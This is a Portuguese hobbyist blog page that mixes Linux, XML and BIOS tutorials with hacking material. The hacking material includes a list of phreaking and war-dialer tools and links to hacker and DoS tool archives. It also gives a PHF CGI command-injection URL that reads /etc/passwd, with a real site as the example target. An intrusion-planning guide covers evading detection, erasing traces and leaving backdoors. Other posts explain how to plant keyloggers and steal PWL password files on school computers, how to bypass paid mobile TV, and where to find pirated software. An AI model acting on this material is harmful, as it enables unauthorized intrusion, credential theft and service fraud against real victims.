Pesquisar neste blog

quinta-feira, 11 de novembro de 2010

Lições de Linux para iniciantes

As 5 lições são:
.
Sobre os sistemas de arquivos e acesso ao disco
http://nosfcj.blogspot.com/2009/01/o-linux-parte-1.html
.
Sobre o ambiente Shell
http://nosfcj.blogspot.com/2009/04/o-linux-parte-2.html
.
Sobre login e gerenciamento de usuário
http://nosfcj.blogspot.com/2009/04/o-linux-parte-3.html
.
Sobre os diretórios no Linux
http://nosfcj.blogspot.com/2009/04/o-linux-parte-4-os-diretorios-no-linux.html
.
Sobre teclas especiais e desligamento
http://nosfcj.blogspot.com/2009/04/o-linux-parte-5-teclas-especiais-e.html
.
Todo o conteúdo com referências em livros e sites conceituados.
Nosf!CJ

[SOFT] Programas Phreacker

AutoHack - War dialer.
CyberPhreack - Útil para hackear sistemas telefônicos.
PhunPak - Pacote com 5 programas phreacker!
FuckHacker - Quebra senhas de frequencia telefonica.
Gunbelt3 - Contém war dialer, irritação de modem, extensão e outras funções!
Callsoft - Programa muito bom mais conhecido como BINA identificador de chamadas.
PbxHack - Programa para hackear o PBX.
ToneGenerator - Gerador de Tone Boxes.
VMBhacker 3.0 - Multi função como escuta de telefones, war dialer, hackear BBS entre outras!
LittleOperator - Com várias funções phreacker! Recomendo!
Apex - Gera várias ligações falsas! Interessante!
FearTools - Possui o red box tone.
BoxTones - Programa sequencial de escuta.
ADial - War dialer.
BlueBeep - Com várias funções como pbx scanner, snanner de frequencias entre outros.
BlueBox - Discador multi frequencial!
CanBox - Gerador de tones canadenses!
CatCall - Ótimo programa discador!
Cellman - Para sacanear telefones celulares! Muito bom!
Cna - Para discagem CNA.
Demon - Um bom programa war dialer.
Keyhole - Gerador de tones.
ModemJammer - Para não rastrearem seu modem!
ModemHunter - War dialer.
OmegaBox - Converte qualquer tipo de frequencias! Muito Bom!
OmniBox - Programa que deixa você brincar e modificar alguns tipos de frequencia.
P80Box - Gera tones para qualquer tipo de caixa como a bluebox e a redbox.
Pager - Programa com o qual você pode hackear o sistema de mensagens de um pager.
PbxScan - Um bom programa discador.
PhoneTag - War dialer.
SuperDial - Um ótimo programa war dialer!
ToneLocUtilities - Scaneia tones.
UltraDial 3.0 - War dialer.
VexationDial - War dialer.
Xdialer - O melhor e mais fácil de usar! War diler!
Tmaster - Programa para quebrar frequencias e tones.
Motorola - Um ótimo programa phreacker.
NoCarrier - Scaneia frequencias telefonicas.
LoginHacker - Programa para hackear modems!

pesquisem sobre eles no www.google.com.br

*Flash Player Pro v3.65 + Patch*

Flash Player Pro é um kit de ferramentas Flash úteis projetado como Adobe Flash Player e o gerenciador. Ele tem diversas ferramentas poderosas flash: faz o download de Filmes Flash da Internet, visualiza e procura filme Flash, Captura imagem Flash e define-a como papel de parede, cria proteção de tela Flash com facilidade, faz a conversão entre SWF e EXE, etc..


http://w15.easy-share.com/1700223522.html

Xml Para Iniciantes

ntrodução
A XML (eXtensible Markup Language, ou Linguagem de Marcação Estendida) é um subconjunto da SGML (Standard Generalized Markup Language, ou Linguagem de Marcação Padrão Generalizada) que permite que uma marcação específica seja criada para especificar idéias e compartilhá-las na rede. Ela tem as virtudes da SGML e da HTML sem qualquer das limitações óbvias.
Pontos fortes da XML
• Inteligência: a XML é inteligente para qualquer nível de complexidade. A marcação pode ser alterada de uma marcação mais geral como " Lassie " para uma mais detalhista, como " Lassie ". As idéias são bem marcadas para que " duplo " e " duplo " sejam sempre valores diferentes. A informação conhece a si mesma. Não é necessária mais nenhuma idéia indesejável;
• Adaptação: a XML é a língua-mãe de outras linguagens. Assim, linguagens como DickML e JaneML tornaram-se possíveis. A adaptação é infinita. Marcações personalizadas podem ser criadas para qualquer necessidade. Se uma marcação que descreva como uma pizza pepperoni é diferente de uma pizza calabresa for necessária, ela pode ser feita;
• Manutenção: a XML é fácil de manter. Ela contém somente idéias e marcações. Folhas de estilos e links vêm em separado, e não escondidas no documento. Cada um pode ser alterado separadamente quando preciso com fácil acesso e fáceis mudanças. Não é preciso mais se achar em uma bagunça de marcações;
• Ligação: a XML possui uma maneira de ligar que inclui todas as formas de ligação. Não só isso; ela liga de maneiras que a HTML não pode. A HTML pode fazer de uma maneira simples, onde um objeto se liga a outro. A XML faz isso, mas também pode ligar dois ou mais pontos a uma idéia. Existem ainda links gêmeos que ligam todas as ideías dentro de uma mesma. Qualquer link entre uma idéia pode ser manipulado de uma única maneira;

• Simplicidade: a XML é simples. Um usuário de média experiência que olha a XML pode achá-la difícil de acreditar no que vê. Comparada com a HTML não. Comparada com a SGML é um estudo de simplicidade. A especificação da SGML tem 300 páginas. A da XML, 33. Idéias obscuras e desnecessárias foram retiradas em favor de idéias concisas. A XML vai direto ao ponto;
• Portabilidade: a XML é de fácil portabilidade. A razão da sua existência é força e portabilidade. A SGML tem força. A HTML tem portabilidade. A XML tem ambas. A XML pode ser navegada com ou sem o seu DTD (Document Type Definition, ou Definição de Tipo de Documento - as normas que definem como as tags são estruturas nos documentos XML), tornando o download mais rápido. Tudo que um navegador precisa para ver XML é ter a noção que ela própria e a folha de estilos controlam a aparência. Se uma validação estrita é necessária, o seu DTD pode acompanhá-lo e fornecer detalhes exatos da sua marcação.
Objetivos do desenvolvimento da XML
A especificação da XML primou pelos seguintes objetivos:
• Deveria ser claro usar a XML na Internet;
• A XML deveria suportar uma grande variedade de aplicações;
• A XML deveria ser compatíel com SGML;
• Deveria ser fácil escrever programas que processem documentos XML;
• O número de recuros opcionais em XML deveria ser mantido em um mínimo absoluto, idealmente zero;

• Os documentos XML deveriam ser legíveis pelos seres humanos e razoavelmente claros;
• O projeto XML deveria ser preparado rapidamente;
• O projeto XML deveria ser formal e conciso;
• Os documentos XML deveriam ser fáceis de serem criados;
• A concisão na marcação em XML é de mínima importância.
Como a XML é definida
A XML é definida pelas seguintes especificações:
• Extensible Markup Language (XML) 1.0: define a sintaxe da XML;
• XML Pointer Language (XPointer) e XML Linking Language (XLink): define um padrão para representar os links entre os recursos. Além dos links simples, como a tag da HTML, a XML possui mecanismos para ligar recursos múltiplos e diferentes. A XPointer desceve como endereçar um recurso, e a XLink descreve como associar dois ou mais recursos;
• Extensible Style Language (XSL): define a linguagem de folhas de estilos padão para a XML.

*Dezenas de ferramentas hackers aqui*

Tire os espaços

http: //www . serveurperso . com/toolz/System/
http: //archiv . egocrew . de/packet/DoS/

INVASÃO VIA BROWSER

O ataque via browser é um dos ataques mais faceis de executar, mas não da nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo: Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.

Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.

*alguns joguinhos para Cell*

GUITAR HERO III
http://w17.easy-share.com/1701084762.html

MARIO KART
http://w13.easy-share.com/1699532015.html

MOBILE MEGA PACK( mais de 10 jogos)
http://w13.easy-share.com/1698501391.html http://w13.easy-share.com/14227941.html

NFS Pro STREET
http://w14.easy-share.com/11202301.html

PRO EVOLUTIO SOCCER 2008
http://w15.easy-share.com/11127951.html

*TVDigital gratis no celular com 3G da VIVO*

vc vai gastar um pouco de credito mas vai valer a pena pois ira poder usar qualquer hra sem limite (basta ter credito pra conectar e repito q NaO GASTA NEM PRA CONECTAR, vai saber pra q precisa de credito pra isso)

1º Vc entra no VIVO play 3G vai em TV e tals...
2º Compre um pacote mais barato q tiver da emissora q desejar(Acho q o de 24 hras é o mais baixo...
3º feito isso o browser irá te direcionar para uma pagina escrito "REPRODUZIR CONTEUDO"
4º salve essa pagina como "instantaneo"(no meu celular é isso) e coloque o browser pra abrir direto na pagina q vc salvou...
pronto !!
toda vez q vc abrir é só clica no "REPRODUZIR CONTEUDO" !!

Pronto Tv de graça Forever auhjauh

Cmd prompt adicionar a abrir a pasta contexto menu

Também drives e Meu Computador

copiar o que está no código de área notepad e salvar como cmd here.reg

CÓDIGO

Windows Registry Editor Version 5,00

[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_CLASSES_ROOT\Directory\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
@="Command Prompt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[TUTO]Planejando uma Invasão!!!

Para planejarmos uma invasão nos temos que levar em consideração
todos os possíveis imprevistos que possam vir a acontecer, esses imprevistos
são tudo aquilo que pode de alguma forma interferir no processo de invasão,
como: erros, senhas, Firewalls, antivírus ou qualquer outro software que preze
pela segurança do PC alvo.
Para fazer um plano de invasão, você deve seguir a seguinte seqüência:
- Definir um alvo
- Definir um objetivo
- Definir as principais vulnerabilidades do alvo
- Definir possíveis portas de entradas e portas de saída
- Definir possíveis imprevistos
- Invadir
- Concluir a invasão



_______________________________________________________________

Definir um alvo:

Primeiramente você deve definir o “alvo” (o Computador que você quer
invadir). Depois que você escolher o alvo, estude o mesmo, qualquer detalhe é
importante.


Definir um objetivo:
Você vai invadir, blz, mas porque? Qual a finalidade dessa invasão e o que você
vai ganhar com isso?
Uma invasão sem motivo passa a ser apenas uma perda de tempo. Para
tudo existe um motivo!

Você quer invadir para ganhar mais conhecimento?

Você quer invadir porque é um desafio para você?

Você quer invadir porque quer provar que o sistema é vulnerável?

Agora motivos como:
Quero invadir porque quero provar que sou um Hacker!

Quero invadir para me vingar de alguém!

Quero invadir para descobrir se minha namorada esta me traindo!

Quero invadir para ver se é legal!

Entre outros motivos infantis.

Nenhum dos motivos acima lhe da uma razão para você fazer uma
invasão, afinal, todos os motivos citados acima são ou pessoais ou de
desestrutura psicológica.

Definir as principais vulnerabilidades do alvo:

Agora que você já tem um alvo e também um objetivo e razão para invadilo,
esta na hora de você procurar por vulnerabilidades no alvo para que você
possa então invadi-lo. Nessa faze você deve usar scanners para saber quais
portas estão vulneráveis, por exemplo, se o site estiver com a porta 21 aberta,
você pode tentar fazer uma invasão por FTP, se o alvo estiver com a porta 23
aberta, você pode tentar invadir por telnet, e por ai vai.

Se o alvo for algum site, você também deve usar scanners como o
acunetix para saber se o mesmo é
vulnerável a “SQL injection”, “PHP injection”, ou se você pode usar algum
“exploit” para explorar alguma outra vulnerabilidade do site.

Definir portas de entrada e portas de saída:
Em seu plano de invasão, você deve definir por onde você vai entrar e por
onde você vai sair (plano de fuga). Em qualquer invasão você entra e sai, se for
uma invasão com trojan a um PC domestico você ira entrar por uma porta, e
sairá pela mesma. Se for uma invasão a um site, você ira entrar de alguma
forma, e sairá de outra forma. Se for uma invasão a um servidor, você irá entrar
por uma porta e sair por outra. E por ai vai.

Você tem que entrar e sair em uma invasão, a não ser que você queira ser
pego, por isso, você já deve saber por onde você irá entrar e por onde você vai
sair, caso contrario você ficara perdido na hora de concluir a invasão.

Definir possíveis imprevistos:

Quando você esta fazendo uma invasão, vários imprevistos podem
ocorrer, como: erros, falta de conexão, ser descoberto, o programa que você
esta usando não funciona, entre outros. Se você for invadir com um trojan,
pense que a vítima pode não executar o server assim que ela baixa-lo, nesse
caso você terá que convencer ainda mais a vitima para ela executar o arquivo.

Se você for invadir um site, pense que o administrador do site pode notar a sua
presença ou até mesmo o seu IP pode ficar gravado no servidor, por isso você
deve usar o Proxy.

Invadir:

Bom, vamos lá, você já tem o alvo, já tem o motivo para invadi-lo, já sabe
as vulnerabilidades do alvo, já sabe por onde você vai entrar e por onde você vai
sair e também já esta preparado para os imprevistos que possam vir a
acontecer, e agora o que falta ? – É isso ai, finalmente chegamos a invasão.
Agora que é só você invadir o alvo e cumprir o seu objetivo. Lembrando que
antes você sempre deve pensar em sua proteção e anonimato, para que você
não seja descoberto.

Concluir a invasão:

Agora que você já invadiu e cumpriu o seu objetivo, você deve concluir a
invasão. Eu sempre digo que “em festa secreta não pode ficar nenhum vestígio
ao final”, o mesmo deve ocorrer com a invasão. Não pode ser deixado nenhum
vestígio que prove a sua invasão ao sistema, para isso, tome cuidado com os
seus atos, nada de destruição e atos de “Cracker”. Depois de limpar a bagunça
saia do alvo encerrando a conexão e concluindo a invasão.

Alguns Hackers, quando invadem servidores, deixam alguns backdoors no
computador alvo, um backdoor é como uma “porta do fundo”, dessa forma o
Hacker pode sair por essa porta e até mesmo entrar por ela quando ele quiser,
pois o administrador até então não terá conhecimento dessa porta.
Pronto!!! Agora você sabe como montar um plano de invasão. De inicio
tudo irá parecer exagero para você, mas eu garanto que não é, até porque, não
á nenhuma complicação para fazer um plano de invasão, basta você ter
criatividade, você pode fazer tudo em sua mente. O plano de invasão é nada
mais nada menos que uma preparação para invasão.



CRÉDITOS : Prof. Paulo Tácio (mundodoshackers.com.br)

Copiar corrompidos . Dat outros arquivos de seu CD

Alguma vez falhou para copiar um arquivo do seu setup cd, como o vídeo ou jogo setup arquivos?
Se o arquivo não é realmente importante, mas ainda necessários para um programa de lançamento, ou é só um arquivo de vídeo que você pode negligenciar o erro, então ainda é muito prático para que você possa fazer alguma coisa antes de enviá-los de volta para o fabricante para obter novos substituição (que pode demorar mais de uma semana de chateação).

A maior parte das razões para este problema seria provavelmente por causa do riscado CD / DVD e houve também casos em que foi menor devido à proteção a ser utilizado em copiar os meios de comunicação social.

Para resolver o problema indicado no título deste post, você precisa avaliar diversos softwares para PC baseado em Windows e ver quais um é capaz de resolver a sua miséria.

O primeiro software que eu recomendo é Isobuster. Suporta CD / DVD / BD / formatos HD DVD e sistemas de ficheiros comuns. É livre (demo plenamente funcional), e são capazes de copiar ficheiros a partir de discos com setores maus.

Outro software que tem funções similares com Isobuster é Blindwrite6 que é capaz de recuperar arquivos a partir do CD / DVD com setores maus e também criar um. Iso (imagem) em seu disco rígido para reproduzir um trabalho exemplar de seus meios de evitar o problema acima . O principal inconveniente deste software é que é limitada por um período experimental, a menos que você compra uma cópia de si mesma.

Se os dois softwares acima você falhou, o último esforço da minha recomendação seria a utilização CloneCD. CloneCD é bastante útil quando você acidentalmente aplicados certo tipo de Cópia Proteção ao escrever o seu disco, que de acordo com a forma como funciona, poderia relatório mau setor em 99% durante o processo de Transferência de Arquivos, embora o arquivo que você deseja copiar poderia perfeitamente ser executado a partir do disco.

CloneCD costas até a sua música, dados, ou navegação CDs, independente se eles estão protegidos cópia ou não.

*1000 Photoshop Brushes | 80.3 MB*

DOWNLOAD 1 - MU
http: //www . megaupload . com/pt/?d=MTMK5CYB
DOWNLOAD 2 -MU
http: //www . orkut . com . br/CommMsgPost . aspx?cmm=47456576

DOWNLOAD - 1 -ES
http: //w13 . easy-share . com/4595501 . html
DOWNLOAD - 2 - ES
http: //w13 . easy-share . com/4595511 . html

PS: RETIRE OS ESPAÇOS

Hackeando pc's da sua escola

1º MÉTODO

Você já deve ter percebido que na sua escola existe algum tipo de rede ligando o computados central, com os computares dos alunos (bom, é assim aqui), mas essa rede só os professores "mais avançados" tem acesso, devido existir senhas para entrar. Você já deve te pensado como deve ter documentos importantes, provas, notas dos alunos, etc nesse computador central, já imagino se você entrar nele? todo mundo já deve te pensado nisso alguma vez, bom existe um método de se descubrir essa senha, claro, tem que ter paciencia, não vai ser de um dia para o outro que você vai dá sorte de conseguir, mas você tem que usar a cabeça (mete THC na mente), vou descrever mais ou menos como você deve fazer isso, mas cuidado, pense nas conseqüencias antes.

Primeiro você tem que arranjar um desse programas abaixos:
Dos: keycopy.zip
Windows 95: keytrap.zip

Esse são programas que gravam em um arquivo todas as teclas apertas desde a execução do mesmo, já deve te sacado o que fazer agora né não, malandro.

Depois de te pego esse arquivo voce mete eles em um disquete, descompactado (claro), e leva ele para a escola no dia que você tiver aquela aula chata de quimíca que vocês vão para a sala de informatica e te que ve aquele programinha fudido "Hyper tabela periódica"(é esse o daqui), bom... por enquanto o professor tiver tirando duvidas dos Lamers você aproveita e mete ele no drive, vai no Prompt do DOS, copia os arquivos do disquete para o diretório Windows (copy a:\*.* c:\), de preferencia, copia os arquivos do "KeyCopy.zip", para que possa fazer ele rodar quando o sistema iniciar sem ninguem perceber. Após você ter copiado o mesmo para o diretório do Windows, vá para a raiz e insira as seguintes linhas no arquivo "autoexec.bat" (use o Edit do MS-DOS):
cd\windows
(acho que é KeyCopy mesmo)

Agora salve o arquivo, saia do prompt e continue figindo que está super interessado na matéria. Você tem que fazer isso no maximo em 1 minuto, para que ninguém perceba. Quando você voltar lá denovo, você pega o mesmo computador que você "crackeou", vá no diretório Windows denovo (via DOS) e copie o arquivo que o programa gravou as informações para o disquete (veja no "manual" do programa em que arquivo ele grava as teclas digitadas), depois disso na sua casa você vê com calma o arquivo e vê se tudo que foi gravado e procura alguma coisa a ver com senha, a se você chegou até aqui o resto é moleza... mas cuidado, seja discreto quando for pegar informações do computador central.

2ºMÉTODO

Quando você for ter as aulas na sala de informática da sua escola, leve um diskette junto. Provavelmente, as senhas de internet, deverão ser todas iguais, pois a escola não seria estúpida de pegar um login para cada computador. E ela também estaria ligada em uma rede certo? 80% de chances de sim. E como toda rede, ela deveria ter um ou mais computadores que fornecem recursos para outros computadores. E como toda a rede, os computadores teriam uma senha para acessar os computadores que fornecem recursos como internet e outros. E nada impede dos operadores colocarem todas as senhas iguais, já que muitos operadores de escolas são burros.

Quando chegar na aula com o diskete, aproveite em quanto todos estiverem zoando, ou se o professor estiver dando aula de um angulo que não dá p/ ver o que você esta fazendo,e vá no dir raiz do windows (EX: C:\WINDOWS) e copie todos os arquivos que tiverem extensão PWL (EX: merda.pwl) para o seu diskette. Por que fazer isso? O Windows possui todas as suas senhas guardadas em arquivos PWLs que ficam no mesmo dir que o windows está. Quando chegar em casa tente descripar esse arquivo. Tente usar programas prórpios par aos PWLs. Muitos consideram o Glide o melhor programa para esta tarefa.

Depois que você conseguiu descriptar as senhas, tente hackear o domínio da sua escola (via internet né burro). Tente hackear por FTP, TELNET, LOCALIZAR/COMPUTADOR, etc. Sempre que pedir login use todas as senhas e usernames que você descriptou. Caso não de nenhuma, tente fazer o mesmo processo, que eu expliquei aqui, só que desta vez em outro computador que você reparou que é "mais importante".

[UM POUCO SOBRE SETUP DO WINDOWS]

Configuração do CMOS Setup
Bios
Bios significa "Basic Input Output system". O Bios é a primeira camada de software do
sistema, um pequeno programa encarregado de reconhecer o hardware, realizar o boot,
e prover informações básicas para o funcionamento do sistema. O Bios é personalizado
para cada modelo de placa mãe, não funcionando em nenhum outro.
Setup
O Setup é um programa que nos permite configurar várias opções acerca do Hardware
instalado, opções relacionadas desempenho do sistema, senhas etc. As configurações
do Setup são cruciais para o funcionamento e bom desempenho do sistema, uma
configuração errada do Setup pode tornar o sistema até 70% mais lento, ou seja, o seu
computador pode virar uma carroça sem cavalos simplesmente devido à uma
configuração errada do Setup do micro. O objetivo deste tutorial é justamente ensinar
como configurar o Setup para um melhor desempenho.

CMOS
CMOS significa 'Complementary Metal Oxide Semicondutor".
Nos primeiros PC's, tais como os antigos XT's e alguns 286's, todos os dados referentes
à configuração dos endereços de IRQ e DMA, quantidade e velocidade das memórias,
HD's instalados etc., eram configurados através de jumpers na placa mãe. Não é preciso
dizer que a configuração de tais jumpers era um trabalho extremamente complicado.
Para facilitar isso, foi criado o Setup, que permite configurar facilmente o sistema.
A função do CMOS é armazenar os dados do Setup pra que não se estes não sejam
perdidos. O CMOS é uma pequena quantidade de memória Ram cerca de 128 bytes,
geralmente embutida no cartucho da Bios. Como a memória Ram é volátil, o CMOS é
alimentado por uma bateria, o que evita a perda dos dados. Porém, esta bateria não dura
pra sempre, de modo que de tempos em tempos ela fica fraca e é preciso troca-la.

Upgrade de BIOS
O Bios é um programa que fica armazenado em chips de memória Flash Ram. O uso
deste tipo de memória visa permitir que o Bios seja modificado. A esta modificação
damos o nome de upgrade de Bios.
De tempos em tempos, surgirem novas tecnologias, como o portas USB, barramento
AGP, SCSI, etc. A função do upgrade de Bios é tornar o micro compatível com estes
novos recursos. Muitas vezes são lançados upgrades também para corrigir Bus no Bios
ou melhorar o suporte a dispositivos. Os fabricantes deixam tais upgrades disponíveis
nas suas páginas para download gratuito, vindo os upgrades na forma de uma arquivo
binário e um programa para gravação dos dados.
Durante o upgrade, os dados do Bios são completamente rescritos. Este é um processo
que costuma durar poucos minutos, o problema é que se a atualização for interrompida
de alguma forma, seja por falta de energia,
um esbarrão no botão de reset, ou qualquer outro imprevisto. A Bios não irá funcionar
mais, e sem ele a placa mãe se torna inútil.

HARDWARE
Por isso, quando for fazer o upgrade do seu Bios, cerque-se de cuidados. Certifique-se
que o arquivo que pegou é o correspondente ao modelo da sua placa mãe e se possível
ligue o micro em um no-break.
Atualmente os grandes fabricante de BIOS são a AWARD, com um Setup baseado em
texto, e a AMI, com sua interface gráfica para o Setup. Apesar das diferenças na
Interface, as opções disponíveis nos Bios destes dois fabricantes são parecidas,
geralmente aparecendo apenas com nome diferentes. Em caso de opções que apareçam
com nomes diferentes dependendo do modelo do Bios, citarei em primeiro lugar o nome

mais comum, colocando outros nomes entre parênteses.
Para entrar no Setup, basta apertar a tecla Del durante a contagem de memória. Dentro
do Setup use as setas do teclado para se locomover entre as opções. As opções do
Setup estão divididas em vários grupos, tais como Bios Features Setup,
Chipset Features Setup, etc.
Em Bios da Award, para acessar as opções de algum grupo use o Enter para voltar use o
Esc. As teclas Page Up e Page Down servem para alterar os valores das opções. No
setup de Bios da AMI você poderá utilizar o mouse para selecionar e mudar as opções, e
o Esc para sair do Setup.
Vou explicar brevemente agora algumas das opções mais comuns. É possível que o seu
BIOS tenha alguma opção não documentada aqui, ou não tenha todas, mas de qualquer
maneira, este tutorial vai lhe dar uma boa base para configurar corretamente qualquer
tipo de BIOS.

Standard CMOS Setup
Esta parte do Setup abriga informações básicas sobre o sistema, como data, hora e
discos instalados, é praticamente igual em todos os modelos de BIOS
Date / Time : Permite alterar a data e hora do relógio do CMOS, estes dados são usados
por vários programas como bancos de dados e pelo relógio do Windows
Hard Disks : Mostra os discos rígidos que estão instalados no computador. Através
dessa opção é possível inserir manualmente o número de trilhas, setores, cabeças, etc.
dos discos, mas é preferível usar a opção de IDE HDD Auto-Detection (está na tela
principal do Setup) para detectar automaticamente os discos instalados. Aqui está
também a opção de ativar ou não o modo de disco LBA, caso o seu disco seja maior do
que 528 megas, esta opção deverá ficar ativada.


Drive A : Tipo de drive de disco flexível instalado como Drive A, o mais comum é
possuirmos drives de 1,44 Mb e 3,5 polegadas, caso possua um drive mais antigo ou um
de 2,8 Mb, basta selecionar a opção correspondente Drive B : Tipo de drive de disco flexível instalado como drive B, caso não exista nenhum
a opção correta é "none"
Vídeo : Caso você possua uma placa SVGA

a opção correta é "EGA/VGA"
Halt On : Procedimento que o Bios deverá tomar caso sejam detectados erros de
hardware durante o teste do sistema (POST)

HARDWARE
All Errors : A inicialização será interrompida caso exista qualquer erro grave na máquina,
como erro de teclado, nos drives de disquete, ou conflitos entre dispositivos
No Errors : O micro tentará inicializará apesar de qualquer erro que possa existir
All, But Keyboard : A inicialização será interrompida por qualquer erro, com exceção de
erros de teclado
All, But Diskette : Qualquer erro com exceção de erros nos drives de disquete
All, but disk/Key : Exceção para erros no teclado e nas unidades de disquete
Bios Features Setup
Configurações sobre o desempenho do sistema e opções do Post: (Enabled = ativado ,
Disabled = desativado) Vírus Warning : Oferece uma proteção rudimentar contra vírus, monitorando as
gravações no setor de boot e na tabela de alocação de arquivos. O problema é que
alguns programas de diagnóstico e particionamento/formatação de disco também
escrevem nestas áreas, o que pode acionar o alarme. Porém é melhor manter esta
opção ativada, pois os vírus que se alojam no setor de boot do HD são difíceis de
eliminar.
CPU Internal Cache : Permite habilitar ou desabilitar o cache interno do processador ou
cache L1, esta opção deve ficar ativada, caso contrário o desempenho do computador irá
cair cerca de 30%.

CPU External Cache : Habilita ou desabilita o cache da placa mãe, ou cache L2. Como a
opção acima, esta também deve ficar ativada. Pode-se desativa-la caso haja alguma
suspeita de defeito no cache L-2
Quick Power On Self Test (Quick Boot) : Caso ativada esta opção, durante o Post
alguns componentes não serão checados, resultando em um Boot um pouco mais
rápido.
Boot Sequence : Define a seqüência na qual os drives serão checados durante o boot:
A, C : Opção mais comum. O sistema irá checar primeiro o drive de disquete à procura
de algum sistema operacional, caso não encontre nada, procurará no disco rígido
C,A : O disco rígido será checado primeiro, e em seguida o disquete
C only : Será checado somente o disco rígido
Dependendo do modelo do seu BIOS, haverá também a opção de dar o boot através do
CD Rom. 1 st Boot Device, 2 nd Boot Device, 3 rd Boot Device, 4 th Boot Device : Estas opções,
encontradas em Bios AMI, equivale à opção Boot Sequence e define a seqüência na qua

HARDWARE
os drives serão checados durante o boot, aqui poderá se definir se o bios tentará dar o
boot primeiro através do drive de disquetes ou através do HD ou mesmo através de drive
de CD Rom
Try Other Boot Device : Caso não encontre nenhum sistema operacional nos drives
selecionados, o Bios irá procura-lo em outros meios de armazenamento, como Zip Drives
e cartões de memória Flash, dependendo do nível de atualização do Bios.
Recomendável a opção "yes"
S.M.A.R.T for Hard Disks : O Smart uma nova tecnologia na qual um HD pode emitir
sinais informando que está com problemas e está prestes a "pifar". Caso o HD seja
compatível, e em conjunto com um programa específico, o HD poderá lhe avisar quando
o pior estiver prestes a acontecer, dando tempo de vc salvar os dados contidos nele.
Esta opção não prejudica em nada o desempenho do HD e é recomendável mante-la
ativada

PS/2 Mouse Function Control : Habilita ou não a porta PS/2. Caso o seu computador
não possua mouse ou teclado PS/2 (aqueles com encaixe redondo de cerca de 0,7 cm
de largura) esta opção deverá ficar desabilitada para desocupar um IRQ.
Swap Floppy Drive : Caso você tenha dois drives de disquetes, esta opção permite que
sem a necessidade de mudar os cabos, inverta-se a posição dos drives, assim o Drive A
passará a ser o drive B e vice-versa.
Boot UP Floppy Seek : Habilita ou não a verificação do Bios para determinar se o drive
de disquetes tem 40 ou 80 trilhas. Como somente os drives antigos de 180 e 360 kb
possuíam 40 trilhas, é recomendável desabilitar esta opção para um boot um pouco mais
rápido.
Boot UP Numlock Status : Define se a tecla Numlock será acionada ou não durante o
boot.
Boot UP System Speed : Define em qual velocidade a CPU irá trabalhar durante o boot:
High : Boot na velocidade máxima do processador
Low : O Boot é executado na velocidade do barramento AT, alguns periféricos mais
antigos (muito antigos :-) requerem que o boot seja dado nesta velocidade.
À não ser que enfrente algum problema devido a algum periférico mais antigo, é
recomendável a opção High para um boot mais rápido.
IDE HDD Block Mode : Esta opção é muito importante. O Block Mode permite que os
dados sejam acessados em blocos, ao invés de ser acessado um setor por vez. Isto
melhora muito o desempenho do HD. Somente HD's muito antigos não aceitam este
recurso. É altamente recomendável manter esta opção ativada, caso contrário, o
desempenho do HD poderá cair em mais de 20%. Em alguns BIOS esta opção está na
sessão "Integrated Peripherals"
Gate 20 option : O Gate 20 é um dispositivo encarregado de endereçar a memória
acima de 1 Mb (memória extendida) esta opção permite definir em qual velocidade será
feito o acesso à memória. É recomendável a opção 'fast"

HARDWARE
Typematic Rate Setting : Habilita ou não o recurso de repetição de teclas.
Typematic Rate (chars/sec) : Define o número de repetições por segundo de uma tecla
pressionada
Typematic Rate Delay (msec) : Define quantos milessegundos o sistema deverá esperar
antes de habilitar a repetição de teclas caso uma tecla fique pressionada.
Security Option : opção relacionado à senha do Setup:
Setup : A senha do micro será solicitada toda vez que se tentar entrar no Setup
System: A senha será solicitada toda vez que se iniciar o micro
USB Function : Habilita ou não o uso de um controlador USB (Universal Serial Bus)
deixe esta opção ativada caso esteja fazendo uso de algum dispositivo USB USB Kb/Mouse Legacy Support : Ativa o suporte por parte do Bios a mouses e teclados
padrão USB
PCI/VGA Palette Snoop : Opção de se instalar mais de uma placa de vídeo, este
recurso é suportado por muitos sistemas operacionais, como o win98 e o OS/2
Assign IRQ for VGA : Reserva uma IRQ do sistema para o uso da placa de vídeo.
Geralmente as placas mais antigas não precisam desse recurso, neste caso ao o
desativarmos ganharemos uma IRQ para ser usa por um outro dispositivo. Porém, A
maioria das placas 3D modernas, Algumas placas porém, como a Viper V330 só
funcionam corretamente se esta opção estiver ativada.
Os Select for Dram > 64 Mb (Boot to OS/2) : Esta opção visa manter compatibilidade
com o OS/2 quando são instalados mais de 64 MB de memória Ram no sistema. Deve
ficar ativada apenas caso você use o OS/2 e possua mais de 64 MB de Ram.
System Bios Shadow : Permite que os dados do Bios sejam copiados para a memória
Ram. O Bios contém informações sobre o hardware do micro que são acessadas a todo
o momento pelo sistema operacional. Como a memória Ram é muito mais rápida do que
a memória Rom onde estes dados estão inicialmente instalados. A ativação do Shadow
irá melhorar o desempenho geral do sistema em aplicativos MS-Dos.

